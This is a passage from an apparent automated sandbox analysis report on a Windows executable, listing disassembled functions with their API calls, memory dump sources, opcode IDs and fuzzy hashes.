                                                                  • std::exception::exception.LIBCMT ref: 004123E1
                                                                    • Part of subcall function 00413A01: std::exception::_Copy_str.LIBCMT ref: 00413A1C
                                                                  • __CxxThrowException@8.LIBCMT ref: 004123D2
                                                                    • Part of subcall function 00415988: RaiseException.KERNEL32(?,?,?,?), ref: 004159CA
                                                                  • __CxxThrowException@8.LIBCMT ref: 004123F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$Copy_strExceptionRaisestd::exception::_std::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 2939012366-962849395
                                                                  • Opcode ID: 40889c1fd86b928a8715d34bbb081b8d3721f4c1486ca8b4e1fa59dc92489ff5
                                                                  • Instruction ID: 898793086584a8fd962b49f0ded41d37ae6e9ed1a61a4fa6f2f43884c1de653b
                                                                  • Opcode Fuzzy Hash: 40889c1fd86b928a8715d34bbb081b8d3721f4c1486ca8b4e1fa59dc92489ff5
                                                                  • Instruction Fuzzy Hash: 9FE0E6F1D50108DECB05EFE1D9468FFB3B89E44704B60055BF501B2141DA396F448B7A
                                                                  Function 00401179 Relevance: 6.2, APIs: 4, Instructions: 169registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?), ref: 00401234
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00401260
                                                                  • __alloca_probe_16.LIBCMT ref: 00401270
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040128A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$Open__alloca_probe_16
                                                                  • String ID:
                                                                  • API String ID: 2359313486-0
                                                                  • Opcode ID: b4913e222e1dc2fcb1141e5b5feffb57943d8df3763a0593eb570ac5d7465af1
                                                                  • Instruction ID: 155446f771d410e671b768db9f992633fbdae1977b8ecb0b0f979a5b3f81bbb5
                                                                  • Opcode Fuzzy Hash: b4913e222e1dc2fcb1141e5b5feffb57943d8df3763a0593eb570ac5d7465af1
                                                                  • Instruction Fuzzy Hash: 1B414C71A002159FDB04CF98CC82FAEB7B8FF49324F144659E515EB390D734AA01CBA4
                                                                  Function 00414E17 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileType.KERNEL32(?,0042D3F8,0000000C,00411411,00000000), ref: 00414E4B
                                                                  • GetLastError.KERNEL32 ref: 00414E55
                                                                  • __dosmaperr.LIBCMT ref: 00414E5C
                                                                  • __set_osfhnd.LIBCMT ref: 00414EA7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastType__dosmaperr__set_osfhnd
                                                                  • String ID:
                                                                  • API String ID: 2557730991-0
                                                                  • Opcode ID: 951e5eca8f9cf6573f11248fffb1cfec838e7949ff6b8f7a42eeaf66110f6452
                                                                  • Instruction ID: 3cc309415f377f4129a0eb94033780c96aa18bf88aced23695ad88617a0cb697
                                                                  • Opcode Fuzzy Hash: 951e5eca8f9cf6573f11248fffb1cfec838e7949ff6b8f7a42eeaf66110f6452
                                                                  • Instruction Fuzzy Hash: 8321D3315453149BDB119F65D8017D97B60BFC1328F68864AE4648B2D2C77D85C2DF8D
                                                                  Function 0041C3BA Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,004157E3), ref: 0041C3BD
                                                                  • __malloc_crt.LIBCMT ref: 0041C3EC
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C3F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                                                  • String ID:
                                                                  • API String ID: 237123855-0
                                                                  • Opcode ID: 3d947bb2433fe0812e5e68e7774175b5042024a56677f6b24546ce2493f57f2c
                                                                  • Instruction ID: 254ac7f8c54955929a6bc1e0f5671cac67dec88514963bcebe1c0ef7fa51bea3
                                                                  • Opcode Fuzzy Hash: 3d947bb2433fe0812e5e68e7774175b5042024a56677f6b24546ce2493f57f2c
                                                                  • Instruction Fuzzy Hash: C2F027376841245A8B307734BCC98EB2369DAD536530B846BFD11C3300FA288EC683AD
                                                                  Function 00413095 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130A2
                                                                  • LeaveCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130BE
                                                                  • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,00401093,00000000), ref: 004130DD
                                                                  • LeaveCriticalSection.KERNEL32(00431B14,?,?,?,00401093,00000000), ref: 004130E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$EnterExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 799838862-0
                                                                  • Opcode ID: 925c1d7a60f30651f737295a61912d32bd66dc2d6f1986c7b4fae4e702ba9d20
                                                                  • Instruction ID: 51a6bbdecdf6f47f4ebbfeeb6a8912ade43f3678a6090e18808c6fdb105ee1f2
                                                                  • Opcode Fuzzy Hash: 925c1d7a60f30651f737295a61912d32bd66dc2d6f1986c7b4fae4e702ba9d20
                                                                  • Instruction Fuzzy Hash: 4FF06236304200A7D6304F55AC44FAABFE8FB89712F50456AFA02E7640C665B9478B59
                                                                  Function 0040DC20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DC34
                                                                    • Part of subcall function 004133AC: std::exception::exception.LIBCMT ref: 004133C1
                                                                    • Part of subcall function 004133AC: __CxxThrowException@8.LIBCMT ref: 004133D6
                                                                    • Part of subcall function 004133AC: std::exception::exception.LIBCMT ref: 004133E7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                  • String ID: invalid map/set<T> iterator$xsB
                                                                  • API String ID: 1823113695-3138870737
                                                                  • Opcode ID: 80e9ecd3d8a99b7c2ec05fac0c7c45e7c623ea9851cbc8fcd2e1498487d9df48
                                                                  • Instruction ID: a79d5b77c9b1e1c4e0fc09c71210dda7b324129ff3d958bd811fbac4ed82f6f9
                                                                  • Opcode Fuzzy Hash: 80e9ecd3d8a99b7c2ec05fac0c7c45e7c623ea9851cbc8fcd2e1498487d9df48
                                                                  • Instruction Fuzzy Hash: 66B1D470A05280DFD715CF68D190A26BFA1AF55304F2880EED4895F392C735ED8ACBE6
                                                                  Function 00410160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::exception::exception.LIBCMT ref: 004102F6
                                                                  • __CxxThrowException@8.LIBCMT ref: 0041030B
                                                                    • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$std::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 2370478142-962849395
                                                                  • Opcode ID: 7adb8718d87319c61736e1b84bd5aceaaf98a07f724dacc252fa01d443a5dae3
                                                                  • Instruction ID: 651e35afa5efbdb74e46a8e88ce115f4b797959aa4cbf5ed1c5213b777d4a3a3
                                                                  • Opcode Fuzzy Hash: 7adb8718d87319c61736e1b84bd5aceaaf98a07f724dacc252fa01d443a5dae3
                                                                  • Instruction Fuzzy Hash: BA519371A00209AFDB04DFA8C841BEEB7B5FF58314F14416AE805E7392D779AE85CB54
                                                                  Function 0040F240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 0040F311
                                                                  • __CxxThrowException@8.LIBCMT ref: 0040F326
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 4063778783-962849395
                                                                  • Opcode ID: 735b278d4fc60832f83ebed191691e287c1e416a9d264ce587dfdb858bb362f9
                                                                  • Instruction ID: 4f6dfa4c55e2a7fe9fe8bf20358b23f4b48a3eb26038b4de4cdee703bad351b0
                                                                  • Opcode Fuzzy Hash: 735b278d4fc60832f83ebed191691e287c1e416a9d264ce587dfdb858bb362f9
                                                                  • Instruction Fuzzy Hash: D451ADB1A00244DFC710DF9CDD41B8AB7B5FB49324F14827AE8159B7A1D7B8A904CB58
                                                                  Function 0040F400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000003FF,00000000,00000000,?), ref: 0040F45A
                                                                  • _wcsrchr.LIBCMT ref: 0040F482
                                                                  Strings
                                                                  • LocalizeStringManager using %s as current directory, xrefs: 0040F537
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName_wcsrchr
                                                                  • String ID: LocalizeStringManager using %s as current directory
                                                                  • API String ID: 2248907744-3895964262
                                                                  • Opcode ID: 7cd2c1b80a029071a3d868f380ad8c9d071f960110b7558a6fa8be9300c1221a
                                                                  • Instruction ID: 4914ca9474b3b6dcf73fb687ff8e699b62779e70258942b32276ef7647460a0e
                                                                  • Opcode Fuzzy Hash: 7cd2c1b80a029071a3d868f380ad8c9d071f960110b7558a6fa8be9300c1221a
                                                                  • Instruction Fuzzy Hash: 73418031A006099FD720DF68CC41B9AB3B8FF44324F14C7BAE569972D1DB74AA46CB94
                                                                  Function 00411110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 004111CD
                                                                  • __CxxThrowException@8.LIBCMT ref: 004111E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
